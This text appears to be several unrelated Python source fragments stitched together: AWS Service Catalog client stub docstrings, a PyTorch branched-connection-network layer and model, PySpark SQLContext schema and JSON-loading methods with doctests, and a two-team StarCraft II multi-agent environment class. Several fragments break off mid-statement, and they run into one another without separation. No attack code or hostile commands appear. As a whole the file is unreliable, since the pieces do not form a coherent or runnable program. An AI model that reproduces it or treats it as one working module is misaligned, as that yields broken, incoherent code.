- **Name** *(string) --*
The name of the provisioning artifact.
- **Description** *(string) --*
The description of the provisioning artifact.
- **Type** *(string) --*
The type of provisioning artifact.
* ``CLOUD_FORMATION_TEMPLATE`` - AWS CloudFormation template
* ``MARKETPLACE_AMI`` - AWS Marketplace AMI
* ``MARKETPLACE_CAR`` - AWS Marketplace Clusters and AWS Resources
- **CreatedTime** *(datetime) --*
The UTC time stamp of the creation time.
- **Active** *(boolean) --*
Indicates whether the product version is active.
- **NextPageToken** *(string) --*
The page token to use to retrieve the next set of results. If there are no additional results, this value is null.
:type AcceptLanguage: string
:param AcceptLanguage:
The language code.
* ``en`` - English (default)
* ``jp`` - Japanese
* ``zh`` - Chinese
:type ProductId: string
:param ProductId: **[REQUIRED]**
The product identifier.
:rtype: dict
:returns:
"""
pass
def list_provisioning_artifacts_for_service_action(self, ServiceActionId: str, PageSize: int = None, PageToken: str = None, AcceptLanguage: str = None) -> Dict:
"""
Lists all provisioning artifacts (also known as versions) for the specified self-service action.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/servicecatalog-2015-12-10/ListProvisioningArtifactsForServiceAction>`_
**Request Syntax**
::
response = client.list_provisioning_artifacts_for_service_action(
ServiceActionId='string',
PageSize=123,
PageToken='string',
AcceptLanguage='string'
)
**Response Syntax**
::
{
'ProvisioningArtifactViews': [
{
'ProductViewSummary': {
'Id': 'string',
'ProductId': 'string',
'Name': 'string',
'Owner': 'string',
'ShortDescription': 'string',
'Type': 'CLOUD_FORMATION_TEMPLATE'|'MARKETPLACE',
'Distributor': 'string',
'HasDefaultPath': True|False,
'SupportEmail': 'string',
'SupportDescription': 'string',
'SupportUrl': 'string'
},
'ProvisioningArtifact': {
'Id': 'string',
'Name': 'string',
'Description': 'string',
'CreatedTime': datetime(2015, 1, 1)
}
},
],
'NextPageToken': 'string'
}
**Response Structure**
- *(dict) --*
- **ProvisioningArtifactViews** *(list) --*
An array of objects with information about product views and provisioning artifacts.
- *(dict) --*
An object that contains summary information about a product view and a provisioning artifact.
- **ProductViewSummary** *(dict) --*
Summary information about a product view.
- **Id** *(string) --*
The product view identifier.
- **ProductId** *(string) --*
The product identifier.
- **Name** *(string) --*
| |
allocated. Default is GPU if
available, otherwise CPU.
dropout: The proportion of dropout to use for this layer, default 0.0.
mean: The mean of the normal distribution to initialize weights, default 0.0.
std: The standard deviation of the normal distribution to initialize weights, default 0.05.
activation: The activation function to use between layers. Default is sigmoid.
last: Whether the layer is the final layer in the model or not, default False. If True, the
forward output is a (10, -1) tensor representing the raw, unnormalized scores of the
ten-digit "keypad" (refer to thesis, Figure 3-3 and associated text) ready for cross
entropy loss.
Attributes:
width (int): The side length of the layer.
hw (int): The product of the layer's height and width, namely ``width * width`` in this
version of BCN.
connections (Connections): The number of direct connections each neuron makes.
branches (Branches): The type of indirect (branching) connections used to construct the
branching network.
device (torch.device): The ``torch.device`` object on which the tensors will be allocated.
Default is GPU if available, otherwise CPU.
dropout (torch.nn.Dropout): The torch Dropout module use when training.
mean (float): The mean of the normal distribution used to initialize weights.
std (float): The standard deviation of the normal distribution used to initialize weights.
activation: The activation function used between layers.
last (bool): Whether the layer is the final layer in the model or not. If ``True``, the
forward output is a (10, -1) tensor representing the raw, unnormalized scores of the
ten-digit "keypad" (refer to thesis, Figure 3-3 and associated text) ready for cross
entropy loss.
ells (range): A range of offsets, centered around 0, used for the direct connections. For
example, 1-to-25 connections will range from -2 to +2 inclusive, because this represents
a span of width 5.
network (Dict[Tuple[int,int],torch.Tensor]): In future versions, this will probably be a
tensor for performance reasons. I'll hold off on complete documentation for now.
weights (Dict[Tuple[int,int],torch.nn.Parameter]): In future versions, this will probably be a
tensor for performance reasons. I'll hold off on complete documentation for now.
mask (Optional[torch.Tensor]): If this is a last layer, the mask attribute represents a
tensor that filters the output to ten values. ``None`` if this is not a last layer.
"""
def __init__(self, width: int, *,
connections: Connections=Connections.ONE_TO_9,
branches: Optional[Branches]=None,
device: Optional[torch.device]=None,
dropout: float=0.0,
mean: float=0.0,
std: float=0.05,
activation=torch.sigmoid,
last: bool=False,
):
super().__init__()
# remember args
self.height = width
self.width = width
self.hw = self.height*self.width
self.connections = connections
if branches is not None:
self.branches = branches
else:
self.branches = DirectOnly()
if connections == Connections.FULLY_CONNECTED:
ell = (self.branches.width-1)//2
else:
ell = (int(math.sqrt(connections.value))-1)//2
self.ells = range(-ell, ell+1)
self.device = DEV if device is None else device
self.activation = activation
self.last = last
# check if the connection matrices are already available locally under ./networks/
fname = Path("./networks/") / self.default_network_filename
if fname.exists():
# yay!
self.network = torch.load(fname, map_location=device)
else:
# construct connection matrices
self.network = BCN.construct_network(
self.width,
self.connections,
self.branches,
device=device
)
# save for later
Path("./networks/").mkdir(exist_ok=True)
torch.save(self.network, fname)
# initialize weights v1.0
c = self.hw if self.connections == Connections.FULLY_CONNECTED else self.connections.value
self.weights = nn.Parameter(
torch.Tensor(c, self.hw, 1, device=device)
)
nn.init.normal_(self.weights, mean=mean, std=std)
#self.register_parameter(f"({dy},{dx})", self.weights[dy,dx])
# dropout
self.dropout = nn.Dropout(p=dropout)
# if last
if last:
self.mask = torch.zeros((width,width)).bool().to(device)
i = (width-3)//2
self.mask[i:i+3,i:i+3] = True
self.mask[i+3,i+1] = True
self.mask = self.mask.reshape((self.hw,1))
else:
self.mask = None
def __repr__(self):
return (
f"{self.__class__.__name__}<"
f"{self.height}x{self.width}"
f"@{self.connections.value}-{self.branches}"
f">"
)
@property
def default_network_filename(self) -> str:
"""The way this model's network file will be named by default.
Format:
``{height}x{width}@{connections}-{branches}.{device}.pt``
"""
return (
f"{self.height}x{self.width}"
f"@{self.connections.value}"
f"-{self.branches}"
f".{self.device.type}"
f".pt"
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""The forward computation performed at every BCNLayer call.
Note:
Call the BCNLayer instance itself instead of using this method directly.
Args:
x: The input tensor of size (``features``, ``batch_size``).
Returns:
The output tensor. Size is (``features``, ``batch_size``) if this layer is not the
last layer, otherwise (10, ``batch_size``).
"""
y = torch.matmul(self.network, x * self.weights) # (c, hw, batch_size)
y = y.sum(0) # (hw, batch_size)
y = self.dropout(y)
if self.last:
batch_size = y.size()[-1]
y = torch.masked_select(y, self.mask)
y = y.reshape((10,batch_size))
y = torch.transpose(y, 0, 1) # CrossEntropyLoss has batch first
else:
y = self.activation(y)
return y
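def _keypad_mask_demo(width: int = 28, batch_size: int = 4):
    # Illustrative helper, not part of the BCN package proper: this mirrors the
    # `last=True` branch of BCNLayer.forward above, showing how the 3x3-plus-one
    # "keypad" mask turns a (width*width, batch) activation map into ten logits.
    # The 28x28 width and batch size are arbitrary MNIST-style assumptions.
    import torch
    mask = torch.zeros(width, width, dtype=torch.bool)
    i = (width - 3) // 2
    mask[i:i + 3, i:i + 3] = True   # digits 1-9 as a 3x3 block
    mask[i + 3, i + 1] = True       # digit 0 centered one row below
    mask = mask.reshape(width * width, 1)
    y = torch.randn(width * width, batch_size)           # fake layer output
    logits = torch.masked_select(y, mask).reshape(10, batch_size)
    return logits.transpose(0, 1)                         # (batch, 10) for CrossEntropyLoss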
class BCN(nn.Module):
"""Represents a branched connection network.
Args:
width: The side length of each layer.
depth: The depth of the network, equal to the number of nonlinear activations.
Keyword Args:
connections: The number of direct connections each neuron makes. Default is 1-to-9.
branches: The type of indirect (branching) connections used to construct the branching
networks for each layer. Default is direct connections only.
device: The `torch.device` object on which the tensors will be allocated. Default is GPU if
available, otherwise CPU.
mean: The mean of the normal distribution to initialize weights, default 0.0.
std: The standard deviation of the normal distribution to initialize weights, default 0.05.
dropout: The dropout factor to use for each layer; default 0.0. If provided a tuple of
floats, use the values for the corresponding layer. For example, (0, 0.3, 0.5) will set
the dropout of the third layer (and following layers if there are any) to 0.5, whereas the
first and second layers will have dropouts of 0 and 0.3 respectively.
activation: The activation function to use between layers. Default is sigmoid.
verbose: Verbosity level. 0 (default) is no text, 1 is some, 2 is most verbose. Might become
deprecated in future versions.
Attributes:
width (int): The side length of each layer.
hw (int): The product of each layer's height and width, namely ``width * width`` in this
version of BCN.
depth (int): The depth of the network, equal to the number of nonlinear activations.
connections (Connections): The number of direct connections each neuron makes.
branches (Branches): The type of indirect (branching) connections used to construct the
branching networks for each layer. Default is direct connections only.
device (torch.device): The `torch.device` object on which the tensors will be allocated.
mean (float): The mean of the normal distribution used to initialize weights.
std (float): The standard deviation of the normal distribution used to initialize weights.
dropout (Tuple[float,...]): The proportion of dropout to use for each layer, as a tuple of
floats corresponding to the first layer, second, and so on. If the length of this tuple is
less than the number of layers, then the remaining layers use the last value in the tuple.
activation: The activation function used between layers.
verbose (int): Verbosity level. 0 (default) is no text, 1 is some, 2 is most verbose. Might
become deprecated in future versions.
trial (Optional[int]): The trial of this model experiment, specified by the BCN.train method.
Used when naming the weights & results files. If ``None``, this model does not represent
any particular trial.
scheme (Optional[TrainingScheme]): The training scheme to use when training this model.
Specified by the BCN.train method.
save_path (Optional[~pathlib.Path]): The path to save weights & results to, specified with the
BCN.train method.
results (Results): The model training results.
layers (~torch.nn.ModuleList): The list of BCNLayer layers.
"""
def __init__(self, width: int, depth: int, *,
connections: Connections=Connections.ONE_TO_9,
branches: Optional[Branches]=None,
device: Optional[torch.device]=None,
mean: float=0.0,
std: float=0.05,
dropout: Union[Tuple[float,...],float]=0.0,
activation=torch.sigmoid,
verbose: int=0,
**kwargs
):
if depth < 1: raise ValueError(f"Depth must be at least 1; given: {depth}.")
super().__init__()
# remember args
self.height = width
self.width = width
self.hw = self.height*self.width
self.depth = depth
self.connections = connections
if branches is not None:
self.branches = branches
else:
self.branches = DirectOnly()
self.save_path = None
self.trial = None
if verbose: print(f"Building BCN model {self.__repr__()}...")
self.device = DEV if device is None else device
self.verbose = verbose
# set up training scheme and results attributes
self.scheme = None
self.results = Results()
# define layers
if isinstance(dropout, (int, float)):
dropout = (dropout,) # convert to tuple
self.dropout = dropout
self.activation = activation
self.layers = nn.ModuleList()
for d in
each row in the sampled dataset. Otherwise, the
first 100 rows of the RDD are inspected. Nested collections are
supported, which can include array, dict, list, Row, tuple,
namedtuple, or object.
Each row could be a L{pyspark.sql.Row} object, a namedtuple, or a plain object.
Using top level dicts is deprecated, as dict is used to represent Maps.
If a single column has multiple distinct inferred types, it may cause
runtime exceptions.
>>> rdd = sc.parallelize(
... [Row(field1=1, field2="row1"),
... Row(field1=2, field2="row2"),
... Row(field1=3, field2="row3")])
>>> df = sqlCtx.inferSchema(rdd)
>>> df.collect()[0]
Row(field1=1, field2=u'row1')
>>> NestedRow = Row("f1", "f2")
>>> nestedRdd1 = sc.parallelize([
... NestedRow(array('i', [1, 2]), {"row1": 1.0}),
... NestedRow(array('i', [2, 3]), {"row2": 2.0})])
>>> df = sqlCtx.inferSchema(nestedRdd1)
>>> df.collect()
[Row(f1=[1, 2], f2={u'row1': 1.0}), ..., f2={u'row2': 2.0})]
>>> nestedRdd2 = sc.parallelize([
... NestedRow([[1, 2], [2, 3]], [1, 2]),
... NestedRow([[2, 3], [3, 4]], [2, 3])])
>>> df = sqlCtx.inferSchema(nestedRdd2)
>>> df.collect()
[Row(f1=[[1, 2], [2, 3]], f2=[1, 2]), ..., f2=[2, 3])]
>>> from collections import namedtuple
>>> CustomRow = namedtuple('CustomRow', 'field1 field2')
>>> rdd = sc.parallelize(
... [CustomRow(field1=1, field2="row1"),
... CustomRow(field1=2, field2="row2"),
... CustomRow(field1=3, field2="row3")])
>>> df = sqlCtx.inferSchema(rdd)
>>> df.collect()[0]
Row(field1=1, field2=u'row1')
"""
if isinstance(rdd, DataFrame):
raise TypeError("Cannot apply schema to DataFrame")
first = rdd.first()
if not first:
raise ValueError("The first row in RDD is empty, "
"can not infer schema")
if type(first) is dict:
warnings.warn("Using RDD of dict to inferSchema is deprecated,"
"please use pyspark.sql.Row instead")
if samplingRatio is None:
schema = _infer_schema(first)
if _has_nulltype(schema):
for row in rdd.take(100)[1:]:
schema = _merge_type(schema, _infer_schema(row))
if not _has_nulltype(schema):
break
else:
warnings.warn("Some of types cannot be determined by the "
"first 100 rows, please try again with sampling")
else:
if samplingRatio < 0.99:
rdd = rdd.sample(False, float(samplingRatio))
schema = rdd.map(_infer_schema).reduce(_merge_type)
converter = _create_converter(schema)
rdd = rdd.map(converter)
return self.applySchema(rdd, schema)
def applySchema(self, rdd, schema):
"""
Applies the given schema to the given RDD of L{tuple} or L{list}.
These tuples or lists can contain complex nested structures like
lists, maps or nested rows.
The schema should be a StructType.
It is important that the schema matches the types of the objects
in each row or exceptions could be thrown at runtime.
>>> rdd2 = sc.parallelize([(1, "row1"), (2, "row2"), (3, "row3")])
>>> schema = StructType([StructField("field1", IntegerType(), False),
... StructField("field2", StringType(), False)])
>>> df = sqlCtx.applySchema(rdd2, schema)
>>> sqlCtx.registerRDDAsTable(df, "table1")
>>> df2 = sqlCtx.sql("SELECT * from table1")
>>> df2.collect()
[Row(field1=1, field2=u'row1'),..., Row(field1=3, field2=u'row3')]
>>> from datetime import date, datetime
>>> rdd = sc.parallelize([(127, -128L, -32768, 32767, 2147483647L, 1.0,
... date(2010, 1, 1),
... datetime(2010, 1, 1, 1, 1, 1),
... {"a": 1}, (2,), [1, 2, 3], None)])
>>> schema = StructType([
... StructField("byte1", ByteType(), False),
... StructField("byte2", ByteType(), False),
... StructField("short1", ShortType(), False),
... StructField("short2", ShortType(), False),
... StructField("int", IntegerType(), False),
... StructField("float", FloatType(), False),
... StructField("date", DateType(), False),
... StructField("time", TimestampType(), False),
... StructField("map",
... MapType(StringType(), IntegerType(), False), False),
... StructField("struct",
... StructType([StructField("b", ShortType(), False)]), False),
... StructField("list", ArrayType(ByteType(), False), False),
... StructField("null", DoubleType(), True)])
>>> df = sqlCtx.applySchema(rdd, schema)
>>> results = df.map(
... lambda x: (x.byte1, x.byte2, x.short1, x.short2, x.int, x.float, x.date,
... x.time, x.map["a"], x.struct.b, x.list, x.null))
>>> results.collect()[0] # doctest: +NORMALIZE_WHITESPACE
(127, -128, -32768, 32767, 2147483647, 1.0, datetime.date(2010, 1, 1),
datetime.datetime(2010, 1, 1, 1, 1, 1), 1, 2, [1, 2, 3], None)
>>> df.registerTempTable("table2")
>>> sqlCtx.sql(
... "SELECT byte1 - 1 AS byte1, byte2 + 1 AS byte2, " +
... "short1 + 1 AS short1, short2 - 1 AS short2, int - 1 AS int, " +
... "float + 1.5 as float FROM table2").collect()
[Row(byte1=126, byte2=-127, short1=-32767, short2=32766, int=2147483646, float=2.5)]
>>> rdd = sc.parallelize([(127, -32768, 1.0,
... datetime(2010, 1, 1, 1, 1, 1),
... {"a": 1}, (2,), [1, 2, 3])])
>>> abstract = "byte short float time map{} struct(b) list[]"
>>> schema = _parse_schema_abstract(abstract)
>>> typedSchema = _infer_schema_type(rdd.first(), schema)
>>> df = sqlCtx.applySchema(rdd, typedSchema)
>>> df.collect()
[Row(byte=127, short=-32768, float=1.0, time=..., list=[1, 2, 3])]
"""
if isinstance(rdd, DataFrame):
raise TypeError("Cannot apply schema to DataFrame")
if not isinstance(schema, StructType):
raise TypeError("schema should be StructType")
# take the first few rows to verify schema
rows = rdd.take(10)
# Row() cannot been deserialized by Pyrolite
if rows and isinstance(rows[0], tuple) and rows[0].__class__.__name__ == 'Row':
rdd = rdd.map(tuple)
rows = rdd.take(10)
for row in rows:
_verify_type(row, schema)
# convert python objects to sql data
converter = _python_to_sql_converter(schema)
rdd = rdd.map(converter)
jrdd = self._jvm.SerDeUtil.toJavaArray(rdd._to_java_object_rdd())
df = self._ssql_ctx.applySchemaToPythonRDD(jrdd.rdd(), schema.json())
return DataFrame(df, self)
def registerRDDAsTable(self, rdd, tableName):
"""Registers the given RDD as a temporary table in the catalog.
Temporary tables exist only during the lifetime of this instance of
SQLContext.
>>> df = sqlCtx.inferSchema(rdd)
>>> sqlCtx.registerRDDAsTable(df, "table1")
"""
if (rdd.__class__ is DataFrame):
df = rdd._jdf
self._ssql_ctx.registerRDDAsTable(df, tableName)
else:
raise ValueError("Can only register DataFrame as table")
def parquetFile(self, path):
"""Loads a Parquet file, returning the result as a L{DataFrame}.
>>> import tempfile, shutil
>>> parquetFile = tempfile.mkdtemp()
>>> shutil.rmtree(parquetFile)
>>> df = sqlCtx.inferSchema(rdd)
>>> df.saveAsParquetFile(parquetFile)
>>> df2 = sqlCtx.parquetFile(parquetFile)
>>> sorted(df.collect()) == sorted(df2.collect())
True
"""
jdf = self._ssql_ctx.parquetFile(path)
return DataFrame(jdf, self)
def jsonFile(self, path, schema=None, samplingRatio=1.0):
"""
Loads a text file storing one JSON object per line as a
L{DataFrame}.
If the schema is provided, applies the given schema to this
JSON dataset.
Otherwise, it samples the dataset with ratio `samplingRatio` to
determine the schema.
>>> import tempfile, shutil
>>> jsonFile = tempfile.mkdtemp()
>>> shutil.rmtree(jsonFile)
>>> ofn = open(jsonFile, 'w')
>>> for json in jsonStrings:
... print>>ofn, json
>>> ofn.close()
>>> df1 = sqlCtx.jsonFile(jsonFile)
>>> sqlCtx.registerRDDAsTable(df1, "table1")
>>> df2 = sqlCtx.sql(
... "SELECT field1 AS f1, field2 as f2, field3 as f3, "
... "field6 as f4 from table1")
>>> for r in df2.collect():
... print r
Row(f1=1, f2=u'row1', f3=Row(field4=11, field5=None), f4=None)
Row(f1=2, f2=None, f3=Row(field4=22,..., f4=[Row(field7=u'row2')])
Row(f1=None, f2=u'row3', f3=Row(field4=33, field5=[]), f4=None)
>>> df3 = sqlCtx.jsonFile(jsonFile, df1.schema())
>>> sqlCtx.registerRDDAsTable(df3, "table2")
>>> df4 = sqlCtx.sql(
... "SELECT field1 AS f1, field2 as f2, field3 as f3, "
... "field6 as f4 from table2")
>>> for r in df4.collect():
... print r
Row(f1=1, f2=u'row1', f3=Row(field4=11, field5=None), f4=None)
Row(f1=2, f2=None, f3=Row(field4=22,..., f4=[Row(field7=u'row2')])
Row(f1=None, f2=u'row3', f3=Row(field4=33, field5=[]), f4=None)
>>> schema = StructType([
... StructField("field2", StringType(), True),
... StructField("field3",
... StructType([
... StructField("field5",
... ArrayType(IntegerType(), False), True)]), False)])
>>> df5 = sqlCtx.jsonFile(jsonFile, schema)
>>> sqlCtx.registerRDDAsTable(df5, "table3")
>>> df6 = sqlCtx.sql(
... "SELECT field2 AS f1, field3.field5 as f2, "
... "field3.field5[0] as f3 from table3")
>>> df6.collect()
[Row(f1=u'row1', f2=None, f3=None)...Row(f1=u'row3', f2=[], f3=None)]
"""
if schema is None:
df = self._ssql_ctx.jsonFile(path, samplingRatio)
else:
scala_datatype = self._ssql_ctx.parseDataType(schema.json())
df = self._ssql_ctx.jsonFile(path, scala_datatype)
return DataFrame(df, self)
def jsonRDD(self, rdd, schema=None, samplingRatio=1.0):
"""Loads an RDD storing one JSON object per string as a L{DataFrame}.
If the schema is provided, applies the given schema to this
JSON dataset.
Otherwise, it samples the dataset with ratio `samplingRatio` to
determine the schema.
>>> df1 = sqlCtx.jsonRDD(json)
>>> sqlCtx.registerRDDAsTable(df1, "table1")
>>> df2 = sqlCtx.sql(
... "SELECT field1 AS f1, field2 as f2, field3 as f3, "
... "field6 as f4 from table1")
>>> for r in df2.collect():
... print r
Row(f1=1, f2=u'row1', f3=Row(field4=11, field5=None), f4=None)
Row(f1=2, f2=None, f3=Row(field4=22..., f4=[Row(field7=u'row2')])
Row(f1=None, f2=u'row3', f3=Row(field4=33, field5=[]), f4=None)
>>> df3 = sqlCtx.jsonRDD(json, df1.schema())
>>> sqlCtx.registerRDDAsTable(df3, "table2")
>>> df4 = sqlCtx.sql(
... "SELECT field1 AS f1, field2 as f2, field3 as f3, "
... "field6 as f4 from table2")
>>> for r in df4.collect():
... print r
Row(f1=1, f2=u'row1', f3=Row(field4=11, field5=None), f4=None)
Row(f1=2, f2=None, f3=Row(field4=22..., f4=[Row(field7=u'row2')])
Row(f1=None, f2=u'row3', f3=Row(field4=33, field5=[]), f4=None)
>>> schema = StructType([
... StructField("field2", StringType(), True),
... StructField("field3",
... StructType([
... StructField("field5",
... ArrayType(IntegerType(), False), True)]), False)])
>>> df5 = sqlCtx.jsonRDD(json, schema)
>>> sqlCtx.registerRDDAsTable(df5, "table3")
>>> df6 = sqlCtx.sql(
... "SELECT field2 AS f1, field3.field5 as f2, "
... "field3.field5[0] as f3 from table3")
>>> df6.collect()
[Row(f1=u'row1', f2=None,...Row(f1=u'row3', f2=[], f3=None)]
>>> sqlCtx.jsonRDD(sc.parallelize(['{}',
... '{"key0": {"key1": "value1"}}'])).collect()
[Row(key0=None), Row(key0=Row(key1=u'value1'))]
>>> sqlCtx.jsonRDD(sc.parallelize(['{"key0": null}',
... '{"key0": {"key1": "value1"}}'])).collect()
[Row(key0=None), Row(key0=Row(key1=u'value1'))]
"""
def
from smac.env.starcraft2.starcraft2 import StarCraft2Env
from smac.env.starcraft2.starcraft2 import races, difficulties, Direction
from smac.env.starcraft2.starcraft2 import actions as actions_api
from operator import attrgetter
from copy import deepcopy
import numpy as np
from absl import logging
from pysc2 import maps
from pysc2 import run_configs
from pysc2.lib import protocol, run_parallel, portspicker
from s2clientprotocol import sc2api_pb2 as sc_pb
from s2clientprotocol import raw_pb2 as r_pb
from s2clientprotocol import debug_pb2 as d_pb
class StarCraft2EnvMulti(StarCraft2Env):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.max_reward_p2 = (
self.n_agents * self.reward_death_value + self.reward_win
)
self.last_action = np.zeros(
(self.n_agents + self.n_enemies, self.n_actions))
self.team_1_heuristic = False
self.team_2_heuristic = False
self.action_error = 0
self.battles_won_team_1 = 0
self.battles_won_team_2 = 0
self.sum_rewards_team1 = 0
self.sum_rewards_team2 = 0
def _launch(self):
# Multi-player launch, based on the implementation in:
# https://github.com/deepmind/pysc2/blob/master/pysc2/env/sc2_env.py
n_players = 2
self._run_config = run_configs.get(version=self.game_version)
self.parallel = run_parallel.RunParallel()
_map = maps.get(self.map_name)
interface_options = sc_pb.InterfaceOptions(raw=True, score=False)
# Reserve a whole bunch of ports
ports = portspicker.pick_unused_ports(n_players * 2)
# Actually launch the game processes.
self._sc2_proc = [self._run_config.start(
extra_ports=ports,
window_size=self.window_size,
want_rgb=False)
for _ in range(n_players)]
self._controller = [p.controller for p in self._sc2_proc]
for c in self._controller:
c.save_map(_map.path, _map.data(self._run_config))
# Create the create request.
create = sc_pb.RequestCreateGame(
local_map=sc_pb.LocalMap(
map_path=_map.path,
map_data=self._run_config.map_data(_map.path)),
realtime=False,
random_seed=self._seed)
for _ in range(n_players):
create.player_setup.add(type=sc_pb.Participant)
self._controller[0].create_game(create)
ports_copy = ports[:]
# Create the join requests.
        join_requests = []
join = sc_pb.RequestJoinGame(race=races[self._agent_race],
options=interface_options)
join.shared_port = 0 # unused
join.server_ports.game_port = ports_copy.pop(0)
join.server_ports.base_port = ports_copy.pop(0)
for _ in range(n_players - 1):
join.client_ports.add(game_port=ports_copy.pop(0),
base_port=ports_copy.pop(0))
        join_requests.append(join)
ports_copy = ports[:]
join = sc_pb.RequestJoinGame(race=races[self._bot_race],
options=interface_options)
join.shared_port = 0 # unused
join.server_ports.game_port = ports_copy.pop(0)
join.server_ports.base_port = ports_copy.pop(0)
for _ in range(n_players - 1):
join.client_ports.add(game_port=ports_copy.pop(0),
base_port=ports_copy.pop(0))
        join_requests.append(join)
        self.parallel.run((c.join_game, join__) for c, join__ in
                          zip(self._controller, join_requests))
game_info = self._controller[0].game_info()
map_info = game_info.start_raw
map_play_area_min = map_info.playable_area.p0
map_play_area_max = map_info.playable_area.p1
self.max_distance_x = map_play_area_max.x - map_play_area_min.x
self.max_distance_y = map_play_area_max.y - map_play_area_min.y
self.map_x = map_info.map_size.x
self.map_y = map_info.map_size.y
self.terrain_height = np.flip(
np.transpose(np.array(list(map_info.terrain_height.data))
.reshape(self.map_x, self.map_y)), 1) / 255
if map_info.pathing_grid.bits_per_pixel == 1:
vals = np.array(list(map_info.pathing_grid.data)).reshape(
self.map_x, int(self.map_y / 8))
self.pathing_grid = np.transpose(np.array([
[(b >> i) & 1 for b in row for i in range(7, -1, -1)]
for row in vals], dtype=np.bool))
else:
self.pathing_grid = np.invert(np.flip(np.transpose(np.array(
list(map_info.pathing_grid.data), dtype=np.bool).reshape(
self.map_x, self.map_y)), axis=1))
def reset(self):
"""Reset the environment. Required after each full episode.
Returns initial observations and states.
"""
self._episode_steps = 0
if self._episode_count == 0:
# Launch StarCraft II
self._launch()
else:
self._restart()
# Information kept for counting the reward
self.death_tracker_ally = np.zeros(self.n_agents)
self.death_tracker_enemy = np.zeros(self.n_enemies)
self.previous_ally_units = None
self.previous_enemy_units = None
self.win_counted = False
self.defeat_counted = False
self.sum_rewards_team1 = 0
self.sum_rewards_team2 = 0
self.last_action = np.zeros(
(self.n_agents + self.n_enemies, self.n_actions))
try:
self._obs = []
for c in self._controller:
self._obs.append(c.observe())
self.init_units()
except (protocol.ProtocolError, protocol.ConnectionError):
self.full_restart()
if self.debug:
logging.debug("Started Episode {}"
.format(self._episode_count).center(60, "*"))
if self.log_more_stats:
self.distance_traveled_team_1 = [0 for _ in range(self.n_agents)]
self.distance_traveled_team_2 = [0 for _ in range(self.n_enemies)]
self.previous_team_1_pos = [[al_unit.pos.x, al_unit.pos.y] for
idx, al_unit
in self.agents.items()]
self.previous_team_2_pos = [[en_unit.pos.x, en_unit.pos.y] for
idx, en_unit
in self.enemies.items()]
self.attack_actions_team_1 = [0 for _ in range(self.n_agents)]
self.attack_actions_team_2 = [0 for _ in range(self.n_enemies)]
self.move_actions_team_1 = [0 for _ in range(self.n_agents)]
self.move_actions_team_2 = [0 for _ in range(self.n_enemies)]
self.stop_actions_team_1 = [0 for _ in range(self.n_agents)]
self.stop_actions_team_2 = [0 for _ in range(self.n_enemies)]
self.once_in_shoot_range_opponent_team_1 = [
[False for _ in range(self.n_enemies)]
for _ in range(self.n_agents)]
self.once_in_shoot_range_opponent_team_2 = [
[False for _ in range(self.n_agents)]
for _ in range(self.n_enemies)]
self.once_in_sight_range_opponent_team_1 = [
[False for _ in range(self.n_enemies)]
for _ in range(self.n_agents)]
self.once_in_sight_range_opponent_team_2 = [
[False for _ in range(self.n_agents)]
for _ in range(self.n_enemies)]
self.move_in_sight_range_team1 = [0 for _ in
range(self.n_agents)]
self.move_toward_in_sight_range_team1 = [
[0 for _ in range(self.n_enemies)] for _ in
range(self.n_agents)]
self.move_away_in_sight_range_team1 = [
[0 for _ in range(self.n_enemies)] for _ in
range(self.n_agents)]
self.move_in_shoot_range_team1 = [0 for _ in range(self.n_agents)]
self.move_toward_in_shoot_range_team1 = [
[0 for _ in range(self.n_enemies)] for _ in
range(self.n_agents)]
self.move_away_in_shoot_range_team1 = [
[0 for _ in range(self.n_enemies)] for _ in
range(self.n_agents)]
self.move_in_sight_range_team2 = [0 for _ in range(self.n_enemies)]
self.move_toward_in_sight_range_team2 = [
[0 for _ in range(self.n_agents)] for _ in
range(self.n_enemies)]
self.move_away_in_sight_range_team2 = [
[0 for _ in range(self.n_agents)] for _ in
range(self.n_enemies)]
self.move_in_shoot_range_team2 = [0 for _ in range(self.n_enemies)]
self.move_toward_in_shoot_range_team2 = [
[0 for _ in range(self.n_agents)] for _ in
range(self.n_enemies)]
self.move_away_in_shoot_range_team2 = [
[0 for _ in range(self.n_agents)] for _ in
range(self.n_enemies)]
return self.get_obs(), self.get_state()
def _restart(self):
"""Restart the environment by killing all units on the map.
There is a trigger in the SC2Map file, which restarts the
episode when there are no units left.
"""
try:
self._kill_all_units()
for _ in range(3):
for c in self._controller:
c.step()
except (protocol.ProtocolError, protocol.ConnectionError):
self.full_restart()
def full_restart(self):
"""Full restart. Closes the SC2 process and launches a new one. """
for p in self._sc2_proc:
p.close()
try:
self._launch()
self.force_restarts += 1
except:
self.full_restart()
def setup_heuristic(self, team_1: bool, team_2: bool):
self.team_1_heuristic = team_1
self.team_2_heuristic = team_2
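    # Discrete action encoding assumed by the bookkeeping in step() below
    # (this is SMAC's usual scheme, and it matches the checks that follow):
    #   0 = no-op (dead units only), 1 = stop,
    #   2/3/4/5 = move north/south/east/west,
    #   >= 6 = attack the enemy with id (action - 6).
    # e.g. actions = [1, 6, 3] -> agent 0 stops, agent 1 attacks enemy 0,
    # agent 2 moves south.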
def step(self, actions):
actions = [int(a) for a in actions]
if self.team_1_heuristic:
for i in range(self.n_agents):
actions[i] = self.get_heuristic_action(i)
if self.team_2_heuristic:
for i in range(self.n_enemies):
actions[self.n_agents + i] = self.get_heuristic_action(
self.n_agents + i)
if self.log_more_stats:
# count type of actions
for i in range(self.n_agents):
if actions[i] > 5:
self.attack_actions_team_1[i] += 1
elif actions[i] > 1:
self.move_actions_team_1[i] += 1
elif actions[i] == 1:
self.stop_actions_team_1[i] += 1
for i in range(self.n_enemies):
if actions[self.n_agents + i] > 5:
self.attack_actions_team_2[i] += 1
elif actions[self.n_agents + i] > 1:
self.move_actions_team_2[i] += 1
elif actions[self.n_agents + i] == 1:
self.stop_actions_team_2[i] += 1
new_pos_team_1 = []
new_pos_team_2 = []
for i in range(self.n_agents):
unit = self.get_unit_by_id(i)
new_pos_team_1.append((unit.pos.x, unit.pos.y))
for i in range(self.n_enemies):
unit = self.get_unit_by_id(self.n_agents + i)
new_pos_team_2.append((unit.pos.x, unit.pos.y))
for i in range(self.n_agents):
shoot_range = self.unit_shoot_range(i)
sight_range = self.unit_sight_range(i)
move_in_shoot_not_counted = True
move_in_sight_not_counted = True
for t_id, t_unit in self.enemies.items():
if t_unit.health > 0:
dist = self.distance(
new_pos_team_1[i][0], new_pos_team_1[i][1],
t_unit.pos.x, t_unit.pos.y
)
if dist <= shoot_range:
self.once_in_shoot_range_opponent_team_1[i][
t_id] = True
